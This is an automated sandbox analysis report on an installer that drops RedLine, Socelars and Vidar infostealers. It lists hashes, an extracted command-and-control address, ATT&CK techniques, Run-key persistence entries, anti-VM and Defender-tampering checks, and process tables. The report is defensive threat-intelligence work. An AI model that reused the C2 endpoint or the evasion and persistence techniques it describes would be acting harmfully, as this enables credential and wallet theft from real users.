redline | b41ece0fdbd279c8c8dd615981603fb4cb7052d28d26ce803fbeb0eef5ea01d2

Resubmissions

26-09-2021 14:47

210926-r55s4sehcp 10

24-09-2021 18:42

210924-xcn8jshegn 10

24-09-2021 17:31

210924-v36t6shdck 10

Analysis

max time kernel
1811s
max time network
1794s
platform
windows11_x64
resource
win11
submitted
24-09-2021 17:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

6.5MB
MD5

745f2a6ae8c3bfce8fdde3d39d788ea7
SHA1

3d6ea6756f20c8e24286238e98209fb898fdb774
SHA256

b41ece0fdbd279c8c8dd615981603fb4cb7052d28d26ce803fbeb0eef5ea01d2
SHA512

7a553805571306d7c53675a4a752a6c63ae1f246a9fa5ce4e6c9729a010672ba48acb9d183715ab0496e54c13d04b7c6f35c8c79e3975bc20326c111d2f8bd37

Score

10^/10

redline socelars vidar matthew2009 aspackv2 discovery evasion infostealer persistence spyware stealer suricata themida trojan

Malware Config

Extracted

Family

redline

Botnet

matthew2009

213.166.69.181:64650

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5732	4884	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6236	4884	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3352	4884	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral4/memory/5560-279-0x0000000000000000-mapping.dmp	family_redline
behavioral4/memory/5560-281-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri15517df7a88264b6.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri15517df7a88264b6.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 19 IoCs

Processes:

mshta.exeWerFault.exesetup_2.tmpWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exetmp6760_tmp.exeSHimenibasi.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 6136 created 4676	6136	mshta.exe	Fri1586c2482e5c8a45.exe
PID 4708 created 1112	4708	WerFault.exe	Fri15cf751fee90f2.exe
PID 1120 created 4768	1120	setup_2.tmp	Fri15c8bd2ae6f94f.exe
PID 2472 created 2928	2472	WerFault.exe	WerFault.exe
PID 5228 created 5180	5228	WerFault.exe	Fri159afce91b41.exe
PID 1872 created 1268	1872	WerFault.exe	rundll32.exe
PID 912 created 5240	912	WerFault.exe	Fri15517df7a88264b6.exe
PID 2928 created 5036	2928	WerFault.exe	Fri15d3a9f0cbde1.exe
PID 4712 created 3840	4712	tmp6760_tmp.exe	8360833.exe
PID 1260 created 4936	1260	SHimenibasi.exe	setup.exe
PID 3156 created 1696	3156	WerFault.exe	udptest.exe
PID 6292 created 6252	6292	WerFault.exe	rundll32.exe
PID 6756 created 1176	6756	WerFault.exe	Fri15364050134.exe
PID 6748 created 1176	6748	WerFault.exe	Fri15364050134.exe
PID 6720 created 1176	6720	WerFault.exe	Fri15364050134.exe
PID 5908 created 1176	5908	WerFault.exe	Fri15364050134.exe
PID 6716 created 5056	6716	WerFault.exe	GcleanerEU.exe
PID 5588 created 2324	5588	WerFault.exe	rundll32.exe
PID 4536 created 4612	4536	WerFault.exe	gcleaner.exe

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral4/memory/1112-310-0x0000000002F10000-0x0000000002FE4000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\libcurlpp.dll	aspack_v212_v242

Blocklisted process makes network request 43 IoCs

Processes:

MsiExec.exe

flow	pid	process
135	7132	MsiExec.exe
137	7132	MsiExec.exe
138	7132	MsiExec.exe
139	7132	MsiExec.exe
140	7132	MsiExec.exe
141	7132	MsiExec.exe
142	7132	MsiExec.exe
143	7132	MsiExec.exe
144	7132	MsiExec.exe
145	7132	MsiExec.exe
146	7132	MsiExec.exe
147	7132	MsiExec.exe
148	7132	MsiExec.exe
149	7132	MsiExec.exe
150	7132	MsiExec.exe
151	7132	MsiExec.exe
152	7132	MsiExec.exe
153	7132	MsiExec.exe
154	7132	MsiExec.exe
156	7132	MsiExec.exe
157	7132	MsiExec.exe
158	7132	MsiExec.exe
159	7132	MsiExec.exe
160	7132	MsiExec.exe
161	7132	MsiExec.exe
162	7132	MsiExec.exe
163	7132	MsiExec.exe
164	7132	MsiExec.exe
165	7132	MsiExec.exe
166	7132	MsiExec.exe
167	7132	MsiExec.exe
168	7132	MsiExec.exe
170	7132	MsiExec.exe
171	7132	MsiExec.exe
172	7132	MsiExec.exe
173	7132	MsiExec.exe
174	7132	MsiExec.exe
175	7132	MsiExec.exe
176	7132	MsiExec.exe
177	7132	MsiExec.exe
178	7132	MsiExec.exe
179	7132	MsiExec.exe
180	7132	MsiExec.exe

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

EtalevzaJet.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts EtalevzaJet.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	EtalevzaJet.exe

Executes dropped EXE 64 IoCs

Processes:

setup_installer.exesetup_install.exeFri15364050134.exeFri15cf751fee90f2.exeFri15d3a9f0cbde1.exeFri158ea592d6f.exeFri15c8bd2ae6f94f.exeFri155e6d4468.exeFri156c10dd46.exeFri1586c2482e5c8a45.exeFri15c47a7c807b12d1.exeFri1574d7b3751ed.exeFri1520f78358.exeFri157e966e73fe.exeFri159afce91b41.exeFri1503acc0996b574.exeFri15517df7a88264b6.exeFri1503acc0996b574.tmpEtalevzaJet.exe2307435.scrFri15c47a7c807b12d1.exe2228814.scrLzmwAqmV.exe6748306.scr2517325.scrChrome 5.exePublicDwlBrowser1100.exesetup.exeWinHoster.exe8014016.scrudptest.exeUltraMediaBurner.exe8964799.scrschtasks.exe6.exeLivelyScreenRecorderF20.exemsedge.exe7913749.exetingwang-game.exesetup_2.tmp381807.exesetup_2.exejhuuee.exesetup_2.tmp3148703.exe8360833.exeLzmwAqmV.exe7963055.exe1421519.exetmp6760_tmp.exe8360833.exeLzmwAqmV.exe4MCYlgNAW.eXEtmp6760_tmp.exeultramediaburner.exeservices64.exeSHimenibasi.exeultramediaburner.tmpSojaeselyno.exeGcleanerEU.exeinstaller.exeanyname.exesihost64.exe

pid	process
4776	setup_installer.exe
4844	setup_install.exe
1176	Fri15364050134.exe
1112	Fri15cf751fee90f2.exe
5036	Fri15d3a9f0cbde1.exe
3884	Fri158ea592d6f.exe
4768	Fri15c8bd2ae6f94f.exe
4732	Fri155e6d4468.exe
4628	Fri156c10dd46.exe
4676	Fri1586c2482e5c8a45.exe
4784	Fri15c47a7c807b12d1.exe
2928	Fri1574d7b3751ed.exe
4588	Fri1520f78358.exe
3592	Fri157e966e73fe.exe
5180	Fri159afce91b41.exe
5152	Fri1503acc0996b574.exe
5240	Fri15517df7a88264b6.exe
5404	Fri1503acc0996b574.tmp
5664	EtalevzaJet.exe
5652	2307435.scr
5560	Fri15c47a7c807b12d1.exe
5740	2228814.scr
5904	LzmwAqmV.exe
5932	6748306.scr
5136	2517325.scr
5484	Chrome 5.exe
340	PublicDwlBrowser1100.exe
4936	setup.exe
1776	WinHoster.exe
1808	8014016.scr
1696	udptest.exe
2328	UltraMediaBurner.exe
2492	8964799.scr
5628	schtasks.exe
4660	6.exe
5600	LivelyScreenRecorderF20.exe
8	msedge.exe
3824	7913749.exe
4004	tingwang-game.exe
6128	setup_2.tmp
1856	381807.exe
5708	setup_2.exe
5420	jhuuee.exe
1120	setup_2.tmp
3148	3148703.exe
3840	8360833.exe
1016	LzmwAqmV.exe
3756	7963055.exe
5956	1421519.exe
1524	tmp6760_tmp.exe
5144	8360833.exe
4172	LzmwAqmV.exe
5024	4MCYlgNAW.eXE
4712	tmp6760_tmp.exe
7092	ultramediaburner.exe
7124	services64.exe
1260	SHimenibasi.exe
6152	ultramediaburner.tmp
5572	Sojaeselyno.exe
2328	UltraMediaBurner.exe
5056	GcleanerEU.exe
1440	installer.exe
1204	anyname.exe
5256	sihost64.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Fri158ea592d6f.exe2517325.scr3148703.exe7963055.exe6748306.scr8014016.scr

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Fri158ea592d6f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Fri158ea592d6f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2517325.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2517325.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3148703.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7963055.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7963055.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6748306.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8014016.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8014016.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3148703.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6748306.scr

Loads dropped DLL 36 IoCs

Processes:

setup_install.exeFri1503acc0996b574.tmprundll32.exesetup_2.tmpsetup_2.tmprundll32.exerundll32.exerundll32.exeinstaller.exerundll32.exeMsiExec.exeMsiExec.exeMsiExec.exe

pid	process
4844	setup_install.exe
4844	setup_install.exe
4844	setup_install.exe
4844	setup_install.exe
4844	setup_install.exe
5404	Fri1503acc0996b574.tmp
1268	rundll32.exe
6128	setup_2.tmp
1120	setup_2.tmp
6252	rundll32.exe
5072	rundll32.exe
5072	rundll32.exe
5156	rundll32.exe
5156	rundll32.exe
1440	installer.exe
1440	installer.exe
1440	installer.exe
2324	rundll32.exe
5472	MsiExec.exe
5472	MsiExec.exe
7132	MsiExec.exe
7132	MsiExec.exe
7132	MsiExec.exe
7132	MsiExec.exe
7132	MsiExec.exe
7132	MsiExec.exe
7132	MsiExec.exe
7132	MsiExec.exe
7132	MsiExec.exe
7132	MsiExec.exe
1440	installer.exe
7132	MsiExec.exe
7132	MsiExec.exe
3416	MsiExec.exe
3416	MsiExec.exe
7132	MsiExec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 7 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri158ea592d6f.exe	themida
C:\Users\Admin\AppData\Local\Temp\7zS8A2AD7F0\Fri158ea592d6f.exe	themida
behavioral4/memory/3884-262-0x0000000000EC0000-0x0000000000EC1000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\6748306.scr	themida
C:\Users\Admin\AppData\Roaming\6748306.scr	themida
C:\Users\Admin\AppData\Roaming\2517325.scr	themida
C:\Users\Admin\AppData\Roaming\2517325.scr	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

2228814.scrEtalevzaJet.exemsedge.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	2228814.scr
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft\\Hygozhyhawy.exe\""	EtalevzaJet.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Fri158ea592d6f.exe2517325.scr8014016.scr3148703.exe7963055.exe6748306.scr

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Fri158ea592d6f.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2517325.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8014016.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3148703.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7963055.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6748306.scr

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

installer.exemsiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\T:	installer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
3 ipinfo.io
15 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

Fri158ea592d6f.exe2517325.scr8014016.scr3148703.exe7963055.exe6748306.scr

pid process

3884 Fri158ea592d6f.exe
5136 2517325.scr
1808 8014016.scr
3148 3148703.exe
3756 7963055.exe
5932 6748306.scr

flow	ioc
1	ip-api.com
3	ipinfo.io
15	ipinfo.io

pid	process
3884	Fri158ea592d6f.exe
5136	2517325.scr
1808	8014016.scr
3148	3148703.exe
3756	7963055.exe
5932	6748306.scr

Suspicious use of SetThreadContext 4 IoCs

Processes:

Fri15c47a7c807b12d1.exe8360833.exetmp6760_tmp.exeservices64.exe

description	pid	process	target process
PID 4784 set thread context of 5560	4784	Fri15c47a7c807b12d1.exe	Fri15c47a7c807b12d1.exe
PID 3840 set thread context of 5144	3840	8360833.exe	8360833.exe
PID 1524 set thread context of 4712	1524	tmp6760_tmp.exe	tmp6760_tmp.exe
PID 7124 set thread context of 4724	7124	services64.exe	explorer.exe

Drops file in Program Files directory 12 IoCs

Processes:

setup_2.tmpEtalevzaJet.exeultramediaburner.tmp

description	ioc	process
File created	C:\Program Files (x86)\FarLabUninstaller\is-7TI4V.tmp	setup_2.tmp
File created	C:\Program Files\Windows Mail\VCVXFMUOAJ\ultramediaburner.exe	EtalevzaJet.exe
File created	C:\Program Files\Windows Mail\VCVXFMUOAJ\ultramediaburner.exe.config	EtalevzaJet.exe
File created	C:\Program Files (x86)\Microsoft\Hygozhyhawy.exe.config	EtalevzaJet.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\Microsoft\Hygozhyhawy.exe	EtalevzaJet.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-U00H1.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-2VA7T.tmp	ultramediaburner.tmp

Drops file in Windows directory 28 IoCs

Processes:

msiexec.exeWerFault.exeMsiExec.exe

description	ioc	process
File created	C:\Windows\Installer\28543.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9AD5.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File created	C:\Windows\SystemTemp\~DFFE06344DC56AFB48.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB826.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB46C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\28543.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9439.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB073.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID892.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9263.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA9AB.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF2B5A12158B9E4C0C.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID2A5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI998C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDA38.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI967C.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFB667F6EA5762F979.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DFCB82E72DB4406190.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8C29.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI97A6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIACE8.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB96F.tmp	msiexec.exe
File created	C:\Windows\Tasks\AdvancedWindowsManager #1.job	MsiExec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 17 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5224	4676	WerFault.exe	Fri1586c2482e5c8a45.exe
5444	1112	WerFault.exe	Fri15cf751fee90f2.exe
4968	2928	WerFault.exe	Fri1574d7b3751ed.exe
3776	4768	WerFault.exe	Fri15c8bd2ae6f94f.exe
3388	5240	WerFault.exe	Fri15517df7a88264b6.exe
3304	5036	WerFault.exe	Fri15d3a9f0cbde1.exe
5200	3840	WerFault.exe	8360833.exe
5820	4936	WerFault.exe	setup.exe
6260	1696	WerFault.exe	udptest.exe
6404	6252	WerFault.exe	rundll32.exe
6896	1176	WerFault.exe	Fri15364050134.exe
6928	1176	WerFault.exe	Fri15364050134.exe
6956	1176	WerFault.exe	Fri15364050134.exe
4196	1176	WerFault.exe	Fri15364050134.exe
1636	5056	WerFault.exe	GcleanerEU.exe
5960	2324	WerFault.exe	rundll32.exe
5848	4612	WerFault.exe	gcleaner.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
